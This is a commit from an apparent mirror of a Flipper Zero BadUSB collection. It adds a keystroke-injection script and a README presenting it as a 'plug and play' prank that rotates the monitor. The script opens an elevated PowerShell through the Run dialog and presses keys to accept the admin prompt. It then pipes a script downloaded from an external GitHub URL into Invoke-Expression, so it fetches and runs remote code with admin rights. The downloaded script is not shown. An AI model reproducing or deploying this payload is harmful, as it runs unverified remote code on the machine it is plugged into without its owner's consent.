mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2026-09-18 19:21:30 +00:00
Adding lost UNC0V3R3D BadUSB Collection
This commit is contained in:
+16
@@ -0,0 +1,16 @@
|
||||
REM Author: UNC0V3R3D
|
||||
REM Description: Uses powershell to rotate the monitor by 90 degrees.
|
||||
REM Version: 1.0
|
||||
REM Category: FUN
|
||||
DELAY 800
|
||||
GUI r
|
||||
DELAY 800
|
||||
STRING powershell Start-Process powershell -Verb runAs
|
||||
DELAY 800
|
||||
ENTER
|
||||
DELAY 800
|
||||
LEFTARROW
|
||||
DELAY 800
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING Invoke-Expression (Invoke-WebRequest -Uri "https://raw.githubusercontent.com/UNC0V3R3D/resources/main/monitor_rotation.ps1").Content
|
||||
@@ -0,0 +1,31 @@
|
||||
# Rotate_Monitor
|
||||
Uses powershell to rotate the monitor by 90 degrees.
|
||||
|
||||
## How to use?
|
||||
|
||||
This script is plug and play.
|
||||
|
||||
|
||||
## Features
|
||||
|
||||
- open powershell
|
||||
- rotate monitor by 90°
|
||||
|
||||
## Feedback
|
||||
|
||||
If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
## Support
|
||||
|
||||
For support, contact me via Discord "UNC0V3R3D#8662".
|
||||
|
||||
|
||||
## Meta
|
||||
|
||||
|
||||
- If you want to sponsor me on Patreon, the link is on my profile.
|
||||
Reference in New Issue
Block a user